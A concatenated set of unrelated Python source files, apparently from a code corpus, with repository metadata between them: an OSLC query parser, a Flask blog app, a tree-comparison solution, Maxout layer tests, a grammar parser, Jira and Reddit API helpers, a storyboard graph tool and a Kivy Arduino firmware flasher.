if isinstance(s[1][0], str):
res1 = [s[1]]
else:
res1 = s[1]
result = [res0, res1, "logicaland"]
return result
def compound_term(self,s):
return s
def boolean_op(self,s):
return "and"
def do_oslcand(self, s):
if isinstance(s, list):
if len(s) == 1:
result = s
else:
result = s
else:
raise Exception( f"s isn't a list! {s=}" )
# put the and first, then term1 then term2
# check if term2 is another and
if s[2][0]=='and':
# if the second term of the and is another and, flatten it out
result = [s[1],s[0],s[2][1], s[2][2]]
else:
# otherwise rearrange to be 'and' term1 term2
result = [s[1],s[0],s[2]]
return result
def term(self, s):
# if RHS (or for in any of the items in RHS list) is a valueidentifier without a prefix, this uses the lhs to resolve the valueidentifier, i.e. as context for attribute value names
# or if RHS is an untyped literal then LHS is used to appy ^^type:name to it to make it a typedliteral
# check if first elem is a property identifier, and if so see if value(s) are identifiers if so resolve them in context of the first identifier (e.g. for enum values)
logger.info( f"Term {type(s)} {s}" )
identifier, op, value = s
if s[0] != '*':
#
if op == "in":
# the "value" is actually a list of values, each of which must be resolved if it is an identifier
if not isinstance(value, list):
value = [value]
resultlist = []
for val in value:
if isinstance(val, str) and not val.startswith('"') and ':' not in val:
# this is an valueidentifier - try to resolve it as an enum in the context of identifier
if self.resolverobject.resolve_enum_name_to_uri is not None:
result = self.resolverobject.resolve_enum_name_to_uri(val,identifier)
if result is None:
raise Exception(f"List ref {val} not resolved in context {identifier}")
resultlist.append("<" + result + ">")
else:
resultlist.append(val)
s[2] = resultlist
else:
t1 = type(value)
logger.info( f"t1 {value} {t1=}" )
if isinstance(value, str) and not value.startswith('"') and not value.startswith("'") and ':' not in value and not re.match("\d",value):
# this is a valueidentifier - try to resolve it as an enum in the context of identifier
if self.resolverobject.resolve_enum_name_to_uri is not None:
result = self.resolverobject.resolve_enum_name_to_uri(value, identifier)
if result is None:
raise Exception(f"Single ref {value} not resolved in context {identifier}")
if result.startswith("http:") or result.startswith("https:"):
s[2] = "<" + result + ">"
else:
s[2] = '"'+result+'"'
logger.info( f"Term returning {s}" )
return s
def simpleidentifier(self,s):
logger.info( f"simpleidentifier {s=}" )
if len(s) != 1:
raise Exception( "Bad simpleidentifier" )
resultname = s[0].value
# look it up and if necessary store to mapping
result = self.resolverobject.resolve_property_name_to_uri(resultname)
if result is None:
raise Exception("Name resolution for %s failed!" % (resultname))
else:
self.mapping_identifer_to_uri[resultname] = result
self.mapping_uri_to_identifer[result] = resultname
logger.info( f"simpleidentifier {result=}" )
return result
def prefixedname(self,s):
logger.info( f"prefixedname {s=}" )
logger.info( f"prefixedname {s=}" )
result = s[0]+":"+s[1]
logger.info( f"prefixedname {result=}" )
return result
def dottedname(self,s):
logger.info( f"dottedname {s=} {s[0]=}" )
if len(s) != 2:
raise Exception( "Bad dottedname" )
# s[0][0] is the shape name
# s[0][1] is the proprty name
shapename = s[0].value
propname = s[1].value
shapeuri = self.resolverobject.resolve_shape_name_to_uri(shapename)
result = self.resolverobject.resolve_property_name_to_uri(propname,shapeuri )
self.mapping_identifer_to_uri[f"{shapename}.{propname}"] = result
self.mapping_uri_to_identifer[result] = f"{shapename}.{propname}"
logger.info( f"dottedname {s=} {s[0]=} returns {result}" )
return result
def identifier(self, s):
logger.info( f"Identifier {s=}" )
if len(s) == 1:
if type(s[0])==str:
result = s[0]
else:
result = s[0].value
elif len(s) > 1:
raise Exception( "Bad identifier" )
logger.info( f"Identifier returning {result=}" )
return result
def urioffoldername(self,s):
logger.info( f"urioffoldername {s=}" )
name=s[0].strip('"')
if self.resolverobject.folder_nametouri_resolver is not None:
uri = self.resolverobject.folder_nametouri_resolver(name)
if uri is None:
raise Exception( "Folder name {name} not found!" )
self.mapping_folders[name]=uri
self.mapping_folders[uri]=name
result = "<"+uri.folderuri+">"
else:
raise Exception( "This application doesn't support folder names!" )
return result
def uriofuser(self,s):
logger.info( f"uriofuser {s=}" )
name=s[0].strip('"')
if self.resolverobject.user_nametouri_resolver is not None:
uri = self.resolverobject.user_nametouri_resolver(name)
if uri is None:
raise Exception( "User name {name} not found!" )
self.mapping_users[name]=uri
self.mapping_users[uri]=name
result = "<"+uri+">"
else:
raise Exception( "This application doesn't support users names!" )
return result
def uriofmodule(self,s):
logger.info( f"uriofmodule {s=}" )
name=s[0].strip('"')
if self.resolverobject.resolve_modulename_to_uri is not None:
uri = self.resolverobject.resolve_modulename_to_uri(name)
if uri is None:
raise Exception( f"Module name {name} not found!" )
logger.info( f"uriofmodule {uri=}" )
self.mapping_modules[name]=uri
self.mapping_modules[uri]=name
result = "<"+uri+">"
else:
raise Exception( "This application doesn't support module names!" )
return result
# def uriofproject(self,s):
# logger.info( f"uriofproject {s=}" )
# name=s[0].strip('"')
# if self.resolverobject.resolve_project_nametouri is not None:
# uri = self.resolverobject.resolve_project_nametouri(name)
# if uri is None:
# raise Exception( f"Project name {name} not found!" )
# logger.info( f"{uri=}" )
# self.mapping_projects[name]=uri
# self.mapping_projects[uri]=name
# result = "<"+uri+">"
# else:
# raise Exception( "This application doesn't support project names!" )
# return result
def valueidentifier(self, s):
logger.info( f"valueidentifier {s=}" )
if len(s)>2:
raise Exception( f"s should be no more than two items {s=}" )
elif len(s)==2:
# this is a prefix:name - check prefix is in the known prefixes and add it to the list of use prefixes
resultname = s[0].value+":"+s[1].value
# for DOORS Next always expand the prefixed name to be an actual URI
result = "<"+rdfxml.tag_to_uri(resultname)+">"
else:
result = s[0].value
logger.info( f"valueidentifier {s=} returning {result}" )
return result
def unsignedinteger(self, s):
logger.info( f"unsignedinteger {s=}" )
result = s[0]
logger.info( f"unsignedinteger {s=} returning {result}" )
return result
def reqid_to_core_uri(self, s):
logger.info( f"reqid_to_core_uri {s=}" )
if len(s)>2:
raise Exception( f"s should be no more than two items {s=}" )
elif len(s)==2:
# this is a prefix:name - check prefix is in the known prefixes and add it to the list of use prefixes
resultname = s[0].value+":"+s[1].value
# for DOORS Next always expand the prefixed name to be an actual URI
result = "<"+rdfxml.tag_to_uri(resultname)+">"
else:
result = s[0].value
# now look it up - using an OSLC query!
requri = self.resolverobject.resolve_reqid_to_core_uri( result )
if requri is None:
raise Exception( f"ID {result} not found!" )
result = "<"+requri+">"
logger.info( f"reqid_to_core_uri {s=} returning {result}" )
return result
def reqid_to_module_uris(self, s):
logger.info( f"reqid_to_module_uris {s=}" )
if len(s)>2:
raise Exception( f"s should be no more than two items {s=}" )
elif len(s)==2:
# this is a prefix:name - check prefix is in the known prefixes and add it to the list of use prefixes
resultname = s[0].value+":"+s[1].value
# for DOORS Next always expand the prefixed name to be an actual URI
result = "<"+rdfxml.tag_to_uri(resultname)+">"
else:
result = s[0].value
# now look it up - using an OSLC query!
requris = self.resolverobject.resolve_reqid_to_module_uris( result )
if requris is None:
raise Exception( f"ID {result} not found!" )
result = "<"+">,<".join(requris)+">"
logger.info( f"reqid_to_module_uris {s=} returning {result}" )
return result
def comparison_op(self, s):
logger.info( f"comparison_op {s=}" )
return s[0].value
def value(self, s):
logger.info( f"value {s=}" )
result = s[0]
logger.info( f"value {s=} returning {result}" )
return result
def invalue(self, s):
logger.info( f"invalue {s=}" )
result = s[0]
logger.info( f"invalue {s=} returning {result}" )
return result
def string_esc(self, s):
logger.info( f"string_esc {s} returning {s[0].value}" )
return s[0].value # string literals include double quotes in the value
def typedliteralstring(self, s):
logger.info( f"typedliteralstring {s}" )
if s[1]=="xsd:datetime":
if not re.match(r'"\d\d\d\d-\d\d-\d\d(T\d\d:\d\d:\d\d((\.|,)\d\d\d)?(Z|[+-]\d\d:\d\d)?)?"',s[0]):
raise Exception( f'Datetime {s[0]} not valid - must be "yyyy-mm-dd[Thh:mm:ss[./,fff]?[Z|+/-hh:mm]]"' )
result = s[0]+"^^"+s[1]
logger.info( f"typedliteralstring {s} returning {result}" )
return result # string literals include double quotes in the value
def literalstring(self, s):
# check for a datetime literal and annotate it with the xsd
if re.match(r'"\d\d\d\d-\d\d-\d\d(T\d\d:\d\d:\d\d((\.|,)\d\d\d)?(Z|[+-]\d\d:\d\d)?)?"',s[0]):
result = s[0]
# this works for DN but not EWM result = s[0]+"^^xsd:datetime"
else:
result = s[0]
logger.info( f"literalstring {s} {s[0]} returning {result}" )
return result # string literals include double quotes in the value
def boolean(self, s):
if s[0].value=="true":
return True
elif s[0].value=="false":
return False
else:
raise Exception( f"Boolean value must be either true or false - f{s[0].value} isn't allowed" )
def decimal(self, s):
logger.info( f"decimal {s=}" )
# try to convert to int first
try:
result = int(s[0].value)
except ValueError:
# otherwise try to convert to float
result = float(s[0].value)
return result
def in_val(self, s):
if len(s) == 1:
result = s[0]
else:
result = s
return result
def inop(self, s):
logger.info( f"inop {s=}" )
return "in"
def scoped_term(self, s):
logger.info( f"scoped_term {s=}" )
return [s[0], "scope", s[1:]]
# from https://tools.oasis-open.org/version-control/svn/oslc-core/trunk/specs/oslc-core.html#selectiveProperties
# with slight tweaks to implement identifier
_select_grammar ="""
select_terms : properties
properties : property ("," property)*
property : dottedname | identifier | wildcard | nested_prop
dottedname : NAME "." NAME
nested_prop : (identifier | wildcard) "{" properties "}"
wildcard : "*"
identifier : ( ( URI_REF_ESC | NAME ) ":" )? NAME
URI_REF_ESC : /<https?:.*>/
NAME : /[a-zA-Z0-9_]\w*/
"""
_orderby_grammar = """
sort_terms : sort_term ("," sort_term)*
sort_term : scoped_sort_terms | signedterm
signedterm : SIGN identifier
scoped_sort_terms : identifier "{" sort_terms "}"
identifier : ( ( URI_REF_ESC | NAME ) ":" )? NAME
URI_REF_ESC : /<https?:.*>/
NAME : /[a-zA-Z0-9_]\w*/
SIGN : ( "+" | "-" | ">" | "<" )
"""
# This class will turn a textual orderby specification into a list of orderby terms
# the transformer does things like turning identifiers (which are human-friendly names) into URIs using nameresolver, and
# turning valueidentifier which are friendly enumeration value names into <URI> (this is done in the term() method)
# leafs of the tree are called first, returning results upwards
class _ParseTreeToOSLCOrderBySelect(lark.visitors.Transformer):
# def __init__(self, shaperesolver=None, nameresolver=None):
def __init__(self, resolverobject):
super().__init__()
self.mapping_uri_to_identifer = {}
self.mapping_identifer_to_uri = {}
self.resolverobject = resolverobject
self.prefixes = {} # prefixes used (will have to be added to oslc.prefix) - NOTE the key is the uri, the value is the prefix!
def select_terms(self,s):
return s[0]
def select_term(self,s):
return s
def nested_prop( self,s):
result = s[0]+"{"+",".join(s[1])+"}"
return result
def wildcard(self,s):
return "*"
def properties(self,s):
return s
def property(self,s):
return s[0]
def sort_terms(self,s):
return s
def sort_term(self,s):
return s[0]
def signedterm(self,s):
# mapping to always + or -
signs = { ">": "+", "<": '-', "+": "+", "-": "-"}
return signs[s[0]]+s[1]
def scoped_sort_terms(self,s):
return s
def identifier(self, s):
if len(s) == 1:
resultname = s[0].value
elif len(s) > 1:
# a prefixed name
resultname = ":".join([s[0].value, s[1].value])
if s[0].value in rdfxml.RDF_DEFAULT_PREFIX:
self.prefixes[rdfxml.RDF_DEFAULT_PREFIX[s[0].value]]=s[0].value
else:
raise Exception( f"Prefix in orderby '{s[0].value}' not found!" )
# look it up and if necessary store to mapping
if ":" not in resultname:
if self.resolverobject.resolve_property_name_to_uri is not None:
result1 = self.resolverobject.resolve_property_name_to_uri(resultname)
if result1 is None:
raise Exception("Name resolution for %s failed!" % (resultname))
else:
self.mapping_identifer_to_uri[resultname] = result1
self.mapping_uri_to_identifer[result1] = resultname
result = rdfxml.uri_to_prefixed_tag(result1, uri_to_prefix_map=self.prefixes)
else:
raise Exception( f"Cannot resolve {resultname} - no name resolver provided! " )
else:
# a prefixed name is assumed to be usable directly (the prefix has been added to prefixes)
result = resultname
return result
``` |
{
"source": "Jjrex8988/BlogCapstoneProject",
"score": 3
} |
#### File: Jjrex8988/BlogCapstoneProject/main.py
```python
from flask import Flask, render_template
import requests
# posts = requests.get("https://api.npoint.io/43644ec4f0013682fc0d").json()
posts = requests.get('https://api.npoint.io/5083070470e7db605e88').json()
app = Flask(__name__)
@app.route('/')
def get_all_posts():
return render_template("index.html", all_posts=posts)
@app.route("/post/<int:index>")
def show_post(index):
requested_post = None
for blog_post in posts:
if blog_post["id"] == index:
requested_post = blog_post
return render_template("post.html", post=requested_post)
@app.route("/about")
def about():
return render_template("about.html")
@app.route("/contact")
def contact():
return render_template("contact.html")
if __name__ == "__main__":
app.run(debug=True)
``` |
{
"source": "jjrodcast/CompetitiveProblems",
"score": 4
} |
#### File: CompetitiveProblems/leetcode/same_tree.py
```python
class TreeNode:
def __init__(self, val=0, left=None, right=None):
self.val = val
self.left = left
self.right = right
class Solution:
def isSameTree(self, p: TreeNode, q: TreeNode) -> bool:
if not p and not q:
return True
elif (p and not q) or (not p and q):
return False
else:
return self.isSameTree(p.left, q.left) and self.isSameTree(p.right, q.right) and p.val == q.val
if __name__ == "__main__":
p = TreeNode(val=1, left=TreeNode(2), right=TreeNode(3))
q = TreeNode(val=1, left=TreeNode(2), right=TreeNode(3))
solution = Solution()
print(solution.isSameTree(p, q))
``` |
{
"source": "jjrojas95/Distintas_tecnicas_GANs",
"score": 3
} |
#### File: Distintas_tecnicas_GANs/tests/maxout_test.py
```python
import unittest
from unittest import TestCase
import numpy as np
import tensorflow as tf
from tensorflow.keras.layers import Layer
from notebooks.helper_func.custom_layers import Maxout
class TestMaxoutLayer(TestCase):
def setUp(self):
self.k = 5
self.units = 240
self.input_shape = (784,)
self.maxout_instance = Maxout(self.units, self.k)
self.maxout_instance.build(self.input_shape)
# @unittest.skip("probando el resultado")
def test_maxout_type(self):
self.assertTrue(isinstance(self.maxout_instance, Layer))
# @unittest.skip("probando el resultado")
def test_kernel_shape(self):
shape = self.maxout_instance.kernel.shape
self.assertEqual(shape, (self.input_shape[0], self.units, self.k))
# @unittest.skip("probando el resultado")
def test_bias_shape(self):
shape = self.maxout_instance.bias.shape
self.assertEqual(shape, (self.units, self.k))
# @unittest.skip("probando el resultado")
def test_output_shape(self):
input_shape = (5,)
units = 10
k = 3
other_maxout = Maxout(units, k, input_shape=input_shape)
x = tf.ones((10,5))
output = other_maxout(x)
self.assertEqual(output.shape, (10, units))
# @unittest.skip("probando el resultado")
def test_output_2samples_1unit(self):
# Primera parte, una sola unidad dos ejemplos y reducción de k.
m = 2
input_shape = (2,)
units = 1
k = 3
w = tf.reshape(tf.cast(tf.range(1,7), tf.float32), (input_shape[-1], units, k))
other_maxout = Maxout(units, k)
other_maxout.build((m, *input_shape))
other_maxout.kernel.assign(w)
x = tf.reshape(tf.cast(tf.range(1,5), tf.float32), (m, *input_shape))
expect_val = tf.reshape(tf.convert_to_tensor([15., 33.]), (m, units))
self.assertEqual(other_maxout(x).numpy().tolist(), expect_val.numpy().tolist())
def test_output_1samples_2unit(self):
m = 1
input_shape = (2,)
units = 2
k = 3
w = tf.reshape(tf.cast(tf.range(1,13), tf.float32), (input_shape[-1], units, k))
other_maxout = Maxout(units, k)
other_maxout.build((m, *input_shape))
other_maxout.kernel.assign(w)
x = tf.reshape(tf.cast(tf.range(1,3), tf.float32), (m, *input_shape))
expect_val = tf.reshape(tf.convert_to_tensor([21., 30.]), (m, units))
self.assertEqual(other_maxout(x).numpy().tolist(), expect_val.numpy().tolist())
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "jjrscott/banteng",
"score": 3
} |
#### File: banteng/banteng/banteng.py
```python
import argparse
import json
def main():
parser = argparse.ArgumentParser(description='Generate a simple abstract syntax tree from the given files',
epilog="""""",
formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument('input', nargs='*', help='Files to be parsed')
parser.add_argument('--output', default='-', help='Location to save the AST')
parser.add_argument('--grammar', help='A JSON file containing the grammar', required=True)
args = parser.parse_args()
with open(args.grammar, 'r') as f:
grammar = json.load(f)
with open(args.grammar, "w") as file:
file.write(json.dumps(grammar, sort_keys=True, indent=2))
file.write("\n")
ast = {}
for input_path in args.input:
with open(input_path, 'r') as file:
text = file.read()
ast[input_path] = generate_ast(text, grammar)
if len(ast) == 1:
ast = list(ast.values())[0]
outputContent = json.dumps(ast, sort_keys=True, indent=2)
if args.output != '-':
with open(args.output, "w") as file:
file.write(outputContent)
file.write("\n")
else:
print(outputContent)
def generate_ast(text, grammar):
# rule = rules[rule_name]
#
# if isinstance(rule, list):
foo = dict()
foo['ast'], foo['unmatched'] = parse_rule(text, grammar, grammar['syntax'])
return foo
def parse_rule(text, grammar, rule):
subresult, subtext = _parse_rule(text, grammar, rule)
if subresult and isinstance(rule, str) and rule != subresult:
subresult = {"type" : rule, "result" : subresult}
return subresult, subtext
def decode_code_point(value):
if isinstance(value, str):
return ord(value)
else:
raise Exception(f'Unknown type: {type(value)}')
def _parse_rule(text, grammar, rule):
if isinstance(rule, str):
if rule in grammar['rules']:
return parse_rule(text, grammar, grammar['rules'][rule])
elif text.startswith(rule):
return rule, text[len(rule):]
else:
return None, text
elif isinstance(rule, dict):
if 'type' in rule and rule['type'] == 'any':
for subrule in rule['values']:
subresult, subtext = parse_rule(text, grammar, subrule)
if subresult:
return subresult, subtext
return None, text
elif 'type' in rule and rule['type'] == 'range':
if len(text) and decode_code_point(rule['begin']) <= ord(text[0]) and decode_code_point(rule['end']) >= ord(text[0]):
return text[0], text[1:]
return None, text
elif 'type' in rule and rule['type'] == 'all':
results = list()
for subrule in rule['values']:
subresult, text = parse_rule(text, grammar, subrule)
if subresult:
results.append(subresult)
else:
return None, text
return results, text
elif 'min' in rule or 'max' in rule:
results = list()
while True:
subresult, text = parse_rule(text, grammar, rule['values'])
if subresult:
results.append(subresult)
if 'max' in rule and len(results) == rule['max']:
return results, text
elif 'min' in rule and len(results) < rule['min']:
return None, text
else:
return results, text
raise Exception(f'Unknown rule: {rule}')
if __name__ == "__main__":
main()
``` |
{
"source": "jjrscott/jira-cache",
"score": 3
} |
#### File: jira-cache/src/common.py
```python
import requests
import json
import sys
class Jira:
def __init__(self, jira_url, jira_user, jira_password):
self.jira_url = jira_url
self.jira_user = jira_user
self.jira_password = jira_password
def search(self, query, startAt=None, fields=None):
params = dict()
params['jql'] = query
if fields: params['fields'] = fields
if startAt: params['startAt'] = startAt
result = requests.get(self.jira_url+'/rest/api/3/search',
auth=(self.jira_user, self.jira_password),
headers={'Content-type': 'application/json'},
params=params)
return result.json()
def searchAll(self, query, fields=None):
issues = list()
while True:
# print("search", file=sys.stderr)
result = self.search(query, startAt=len(issues), fields=fields)
if 'issues' in result and len(result['issues']) > 0:
issues += result['issues']
if 'total' in result and len(issues) >= result['total']:
break
else:
break
return issues
def sql_get_rows(conn, query, *values):
return conn.execute(query, values)
def sql_set_row(conn, table, **row):
keys = sorted(row)
sql = f"""REPLACE INTO {table} ({','.join(map(lambda key: f"`{key}`", keys))}) VALUES ({','.join('?'*len(keys))})"""
try:
conn.execute(sql, list(map(lambda key: row[key], keys)))
except Exception as e:
print('sql', sql)
print('keys', keys)
print('row', row)
raise
def value_in_dict(object, *keys):
for key in keys:
if key in object and object[key]:
object = object[key]
else:
return None
return object
``` |
{
"source": "jjrscott/StoryboardGraph",
"score": 3
} |
#### File: jjrscott/StoryboardGraph/storyboard-graph.py
```python
import argparse
from xml.etree import ElementTree
import os
def main():
parser = argparse.ArgumentParser(description='Visualise a collection of storyboards as a unified directed graph')
parser.add_argument('storyboard', nargs='+', help='Path to Storyboards')
args = parser.parse_args()
print(f"graph TD")
builder = TreeBuilder()
for storyboard_path in args.storyboard:
storyboard_name = os.path.splitext(os.path.basename(storyboard_path))[0]
builder.currentStoryboardName = storyboard_name
ElementTree.parse(storyboard_path, ElementTree.XMLParser(target=builder))
builder.finalize()
class TreeBuilder(ElementTree.TreeBuilder):
def __init__(self):
self.lastComment = None
self.currentStoryboardName = None
self.mainSceneObjectId = None
self.links = set()
self.stack = list()
self.previousTag = None
def finalize(self):
print()
for link in self.links:
print(link)
def comment(self, data):
# print(data)
self.lastComment = data
def start(self, tag, attrs):
if tag == 'document':
print(f" subgraph {self.currentStoryboardName}")
if 'initialViewController' in attrs:
print(f" {self.currentStoryboardName}_([ ])")
self.links.add(f"{self.currentStoryboardName}_ --> {attrs['initialViewController']}")
if 'storyboardIdentifier' in attrs:
print(f" {self.currentStoryboardName}_{attrs['storyboardIdentifier']}([{attrs['storyboardIdentifier']}])")
self.links.add(f"{self.currentStoryboardName}_{attrs['storyboardIdentifier']} -.-> {attrs['id']}")
if self.previousTag == 'objects' and 'id' in attrs:
self.mainSceneObjectId = attrs['id']
print(f" {self.mainSceneObjectId}[{self.lastComment}]")
if tag == 'viewControllerPlaceholder':
self.links.add(f"{self.mainSceneObjectId} -.-> {attrs['storyboardName']}_{attrs.get('referencedIdentifier','')}")
if tag == 'segue':
if self.mainSceneObjectId is None and 'scene' in self.stack:
raise ValueError(f"Missing mainSceneObjectId in {self.currentStoryboardName} {attrs}")
if 'destination' in attrs:
self.links.add(f"{self.mainSceneObjectId} -->|{attrs.get('identifier',' ')}| {attrs['destination']}")
# else:
# exit(f"{attrs}")
if 'exit' == tag:
if self.mainSceneObjectId is None and 'scene' in self.stack:
raise ValueError(f"Missing mainSceneObjectId in {self.currentStoryboardName} {attrs}")
print(f" {attrs['id']}[[{attrs['userLabel']}]]")
self.links.add(f"{self.mainSceneObjectId} --> {attrs['id']}")
self.stack.append(tag)
self.previousTag = tag
def end(self, tag):
self.stack.pop()
if tag == 'document':
self.currentStoryboardName = None
print(f" end")
elif tag == 'scene':
self.mainSceneObjectId = None
def parse_node(node, *stack):
print(" " * len(stack), node.tag)
for subnode in node:
parse_node(subnode, node.tag, *stack)
def compile_pattern(pattern):
pattern = re.sub(r'{(\d+)}', '{{\\1}}', pattern)
try:
return re.compile(pattern, flags=re.MULTILINE|re.DOTALL)
except Exception as e:
print(pattern)
raise
if __name__ == "__main__":
main()
``` |
{
"source": "jjs027/datastructures",
"score": 3
} |
#### File: ds2/figs/drawing.py
```python
from ds2viz.canvas import svg_plus_pdf
from ds2viz.datastructures import VizList, VizBST, VizTree
from ds2.tree import Tree
import os.path
def figpath(name):
return os.path.join('../figures', name)
def drawbst(T, name):
vizT = VizBST(T._root, (5,5))
with svg_plus_pdf(600, vizT.height + 10, figpath(name)) as canvas:
vizT.draw(canvas)
def drawlist(L, name):
vizL = VizList(L)
vizL.position = (5,5)
with svg_plus_pdf(600, 60, figpath(name)) as canvas:
vizL.draw(canvas)
def drawtree(T, name):
if isinstance(T, list):
T = Tree(T)
vizT = VizTree(T)
vizT.position = (5,5)
with svg_plus_pdf(600, vizT.height + 10, figpath(name)) as canvas:
vizT.draw(canvas)
``` |
{
"source": "jjsanmartino03/Wallpaper-changer",
"score": 3
} |
#### File: jjsanmartino03/Wallpaper-changer/reddit.py
```python
import os
import praw # Python Reddit API Wrapper (PRAW). More information at "https://praw.readthedocs.io/en/latest/index.html"
from prawcore.exceptions import RequestException
from dotenv import load_dotenv
"""
To access the Reddit API you must have a client_id, a client_secret,and a user_agent (user_agent can be any string of text). You can easily obtain those by creating your own app at 'https://old.reddit.com/prefs/apps/'. If you don't have a redirect uri (obligatory to create the app), you can use instead 'http://www.example.com/unused/redirect/uri', to fill that field.
For this program to work, you must add the id and secret to the .env file in this directory in the format:
CLIENT_SECRET="xxxxx"
CLIENT_ID="yyyyy"
"""
def get_image_url():
load_dotenv() # Add the varibles in the .env file to the global environment
r = praw.Reddit(
client_id=os.getenv("CLIENT_ID"), # Get the environmental variables
client_secret=os.getenv("CLIENT_SECRET"),
user_agent="Wallpaper getter by u/Chu-lian13", #This is an example of user_agent, you can put whatever you want
)
try: # This is to prevent a network error
image_url = r.subreddit("wallpaper").random().url # get a random image url from reddit
while ".jpg" != image_url[-4:]: # Try until it finds the proper format of image
image_url = image_url = r.subreddit("wallpaper").random().url
return image_url
except:
return False
if __name__ == "__main__":
print(get_image_url())
``` |
{
"source": "jjsch-dev/PyArduinoFlash",
"score": 3
} |
#### File: PyArduinoFlash/kivymd/main.py
```python
from kivy.lang import Builder
from kivy.clock import Clock
from kivymd.app import MDApp
import threading
from queue import Queue
from intelhex import IntelHex
from intelhex import AddressOverlapError
from arduinobootloader import ArduinoBootloader
KV = '''
Screen:
MDBoxLayout:
orientation:"vertical"
padding:10
spacing:10
MDBoxLayout:
orientation:"horizontal"
padding:10
spacing:10
MDLabel:
text:"Bootloader version"
MDLabel:
id:sw_version
text:"--"
MDBoxLayout:
orientation:"horizontal"
padding:10
spacing:10
MDLabel:
text:"Bootloader hardware version"
MDLabel:
id:hw_version
text:"--"
MDBoxLayout:
orientation:"horizontal"
padding:10
spacing:10
MDLabel:
text:"Bootloader name"
MDLabel:
id:prg_name
text:"--"
MDBoxLayout:
orientation:"horizontal"
padding:10
spacing:10
MDLabel:
text:"CPU Name"
MDLabel:
id:cpu_version
text:"--"
MDBoxLayout:
orientation:"horizontal"
padding:10
spacing:10
MDLabel:
text:"File information"
MDLabel:
id:file_info
text:"--"
MDBoxLayout:
orientation:"horizontal"
padding:10
spacing:10
MDTextField
id:file_name
hint_text: "Intel HEX file format"
helper_text: "Please enter the file and path of the Arduino firmware"
helper_text_mode: "on_focus"
text:"test.hex"
MDBoxLayout:
orientation: "horizontal"
ScrollView:
MDList:
ThreeLineAvatarListItem:
on_release: app.on_sel_programmer(115200, "Stk500v1")
text: "Protocol arduino or STK500V1"
secondary_text: "for boards up to 128 Kbytes"
tertiary_text: "example Nano or Uno - baudarate 115200"
ImageLeftWidget:
source: "images/arduino-nano.png"
ThreeLineAvatarListItem:
on_release: app.on_sel_programmer(57600, "Stk500v1")
text: "Protocol arduino or STK500V1 - older"
secondary_text: "for boards up to 128 Kbytes"
tertiary_text: "example Nano or Uno - baudarate 57600"
ImageLeftWidget:
source: "images/arduino-uno.png"
ThreeLineAvatarListItem:
on_release: app.on_sel_programmer(115200, "Stk500v2")
text: "Protocol wiring or STK500V2"
secondary_text: "for boards with more than 128 Kbytes"
tertiary_text: "example Mega - baudarate 115200"
ImageLeftWidget:
source: "images/arduino-mega-2560-original.png"
MDBoxLayout:
padding: "10dp"
orientation: "horizontal"
MDProgressBar:
id: progress
value: 0
min: 0
max: 1
MDBoxLayout:
padding: "10dp"
orientation: "horizontal"
MDLabel:
id: status
text:"--"
MDRectangleFlatButton:
text:"Flash"
pos_hint:{'center_x': .5, 'center_y': .5}
on_release:app.on_flash()
'''
class MainApp(MDApp):
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.ih = IntelHex()
self.ab = ArduinoBootloader()
self.working_thread = None
self.progress_queue = Queue(100)
self.protocol = "Stk500v1"
self.baudrate = 115200
def build(self):
return Builder.load_string(KV)
def on_sel_programmer(self, baudrate, protocol):
self.baudrate = baudrate
self.protocol = protocol
def on_flash(self):
del self.ih
try:
self.ih = IntelHex()
self.ih.fromfile(self.root.ids.file_name.text, format='hex')
except FileNotFoundError:
self.root.ids.file_info.text = "File not found"
return
except AddressOverlapError:
self.root.ids.file_info.text = "File with address overlapped"
return
self.root.ids.file_info.text = "start address: {} size: {} bytes".format(self.ih.minaddr(), self.ih.maxaddr())
"""The firmware update is done in a worker thread because the main
thread in Kivy is in charge of updating the widgets."""
self.root.ids.progress.value = 0
self.working_thread = threading.Thread(target=self.thread_flash)
self.working_thread.start()
def thread_flash(self):
"""If the communication with the bootloader through the serial port could be
established, obtains the information of the processor and the bootloader."""
res_val = False
"""First you have to select the communication protocol used by the bootloader of
the Arduino board. The Stk500V1 is the one used by the Nano or Uno, and depending
on the Old or New version, the communication speed varies, for the new one you
have to use 115200 and for the old 57600.
The communication protocol for boards based on Mega 2560 is Stk500v2 at 115200."""
prg = self.ab.select_programmer(self.protocol)
if prg.open(speed=self.baudrate):
if prg.board_request():
self.progress_queue.put(["board_request"])
Clock.schedule_once(self.progress_callback, 1 / 1000)
if prg.cpu_signature():
self.progress_queue.put(["cpu_signature"])
Clock.schedule_once(self.progress_callback, 1 / 1000)
"""Iterate the firmware file into chunks of the page size in bytes, and
use the write flash command to update the cpu."""
for address in range(0, self.ih.maxaddr(), self.ab.cpu_page_size):
buffer = self.ih.tobinarray(start=address, size=self.ab.cpu_page_size)
res_val = prg.write_memory(buffer, address)
if not res_val:
break
self.progress_queue.put(["write", address / self.ih.maxaddr()])
Clock.schedule_once(self.progress_callback, 1 / 1000)
"""If the write was successful, re-iterate the firmware file, and use the
read flash command to update and compare them."""
if res_val:
for address in range(0, self.ih.maxaddr(), self.ab.cpu_page_size):
buffer = self.ih.tobinarray(start=address, size=self.ab.cpu_page_size)
read_buffer = prg.read_memory(address, self.ab.cpu_page_size)
if not len(read_buffer) or (buffer != read_buffer):
res_val = False
break
self.progress_queue.put(["read", address / self.ih.maxaddr()])
Clock.schedule_once(self.progress_callback, 1 / 1000)
self.progress_queue.put(["result", "ok" if res_val else "error", address])
Clock.schedule_once(self.progress_callback, 1 / 1000)
prg.leave_bootloader()
prg.close()
else:
self.progress_queue.put(["open_error"])
Clock.schedule_once(self.progress_callback, 1 / 1000)
def progress_callback(self, dt):
"""In kivy only the main thread can update the widgets. Schedule a clock
event to read the message from the queue and update the progress."""
value = self.progress_queue.get()
if value[0] == "open_error":
self.root.ids.status.text = "Can't open bootloader {} at baudrate {}".format(self.protocol, self.baudrate)
if value[0] == "board_request":
self.root.ids.sw_version.text = self.ab.sw_version
self.root.ids.hw_version.text = self.ab.hw_version
self.root.ids.prg_name.text = self.ab.programmer_name
if value[0] == "cpu_signature":
self.root.ids.cpu_version.text = self.ab.cpu_name
if value[0] == "write":
self.root.ids.status.text = "Writing flash %{:.2f}".format(value[1]*100)
self.root.ids.progress.value = value[1]
if value[0] == "read":
self.root.ids.status.text = "Reading and verifying flash %{:.2f}".format(value[1]*100)
self.root.ids.progress.value = value[1]
if value[0] == "result" and value[1] == "ok":
self.root.ids.status.text = "Download done"
self.root.ids.progress.value = 1
if value[0] == "result" and value[1] == "error":
self.root.ids.status.text = "Error writing"
MainApp().run()
